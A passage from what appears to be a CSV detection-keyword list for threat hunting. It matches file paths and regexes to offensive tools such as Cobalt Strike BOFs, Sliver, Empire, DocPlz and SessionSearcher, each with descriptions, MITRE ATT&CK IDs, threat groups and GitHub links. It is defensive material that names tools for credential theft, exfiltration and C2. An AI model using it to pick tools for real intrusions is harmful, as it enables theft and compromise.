Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/SecScanC2.git*",".{0,1000}\/SecScanC2\.git.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. 
The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*/sec-tools/litefuzz*",".{0,1000}\/sec\-tools\/litefuzz.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","1","N/A","7","1","63","11","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*/SeeYouCM-Thief*",".{0,1000}\/SeeYouCM\-Thief.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","9","2","176","33","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*/self_delete.cna*",".{0,1000}\/self_delete\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF implementation of the research by @jonasLyk and the drafted PoC from @LloydLabs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Self_Deletion_BOF","1","1","N/A","10","10","166","23","2021-10-03T19:10:21Z","2021-10-03T19:01:14Z" "*/self_deletion.exe*",".{0,1000}\/self_deletion\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/SeManageVolumeExploit.git*",".{0,1000}\/SeManageVolumeExploit\.git.{0,1000}","offensive_tool_keyword","SeManageVolumeExploit","This exploit grants full permission on C:\ drive for all users on the machine","T1046 - T1098 - T1222.002","TA0007 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/CsEnox/SeManageVolumeExploit","1","1","N/A","10","1","65","15","2023-05-29T05:41:16Z","2021-10-11T01:17:04Z" "*/SeriousSam.sln*",".{0,1000}\/SeriousSam\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*/server/c2/*",".{0,1000}\/server\/c2\/.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/server/common/stagers.py*",".{0,1000}\/server\/common\/stagers\.py.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - 
T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/ServerC2.cpp*",".{0,1000}\/ServerC2\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*/ServerC2.exe*",".{0,1000}\/ServerC2\.exe.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*/ServerlessRedirector.git*",".{0,1000}\/ServerlessRedirector\.git.{0,1000}","offensive_tool_keyword","ServerlessRedirector","Serverless Redirector in various cloud vendor for red team","T1090.003 - T1095 - T1001.003","TA0010 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/KINGSABRI/ServerlessRedirector","1","1","N/A","10","1","69","10","2022-12-08T08:56:02Z","2022-12-08T07:52:49Z" "*/servers/dns_server.py*",".{0,1000}\/servers\/dns_server\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration 
simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/servers/icmp_server.py*",".{0,1000}\/servers\/icmp_server\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/servers/smb_server.py*",".{0,1000}\/servers\/smb_server\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/serverscan/CobaltStrike*",".{0,1000}\/serverscan\/CobaltStrike.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*/serverscan_Air*",".{0,1000}\/serverscan_Air.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*/serverscan_pro*",".{0,1000}\/serverscan_pro.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*/ServerScanForLinux/*",".{0,1000}\/ServerScanForLinux\/.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - 
APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*/ServerScanForWindows/*",".{0,1000}\/ServerScanForWindows\/.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*/ServerScanForWindows/PE*",".{0,1000}\/ServerScanForWindows\/PE.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*/ServiceMove-BOF/*",".{0,1000}\/ServiceMove\-BOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","New Lateral Movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 
- Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","10","10","277","46","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z" "*/ServiceName:TokenDriver*",".{0,1000}\/ServiceName\:TokenDriver.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*/Services/TransitEXE.exe*",".{0,1000}\/Services\/TransitEXE\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*/servicetags.nse*",".{0,1000}\/servicetags\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/SessionSearcher.exe*",".{0,1000}\/SessionSearcher\.exe.{0,1000}","offensive_tool_keyword","SessionSearcher","Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details","T1552.004 - T1083 - T1114.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/SetNTLM.ps1*",".{0,1000}\/SetNTLM\.ps1.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","1","N/A","10","2","164","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z" "*/SetProcessInjection.git*",".{0,1000}\/SetProcessInjection\.git.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","2","135","29","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" "*/setuserpass.x64.*",".{0,1000}\/setuserpass\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/setuserpass.x86.*",".{0,1000}\/setuserpass\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/sfp_openphish.py*",".{0,1000}\/sfp_openphish\.py.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*/sfp_spider.py*",".{0,1000}\/sfp_spider\.py.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*/sh_executor/*.go*",".{0,1000}\/sh_executor\/.{0,1000}\.go.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*/s-h-3-l-l/*",".{0,1000}\/s\-h\-3\-l\-l\/.{0,1000}","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation 
tools","https://github.com/s-h-3-l-l/katoolin3","1","1","N/A","N/A","4","336","112","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" "*/shadowcoerce.py*",".{0,1000}\/shadowcoerce\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/shadowcoerce.py*",".{0,1000}\/shadowcoerce\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/ShadowForgeC2*",".{0,1000}\/ShadowForgeC2.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - 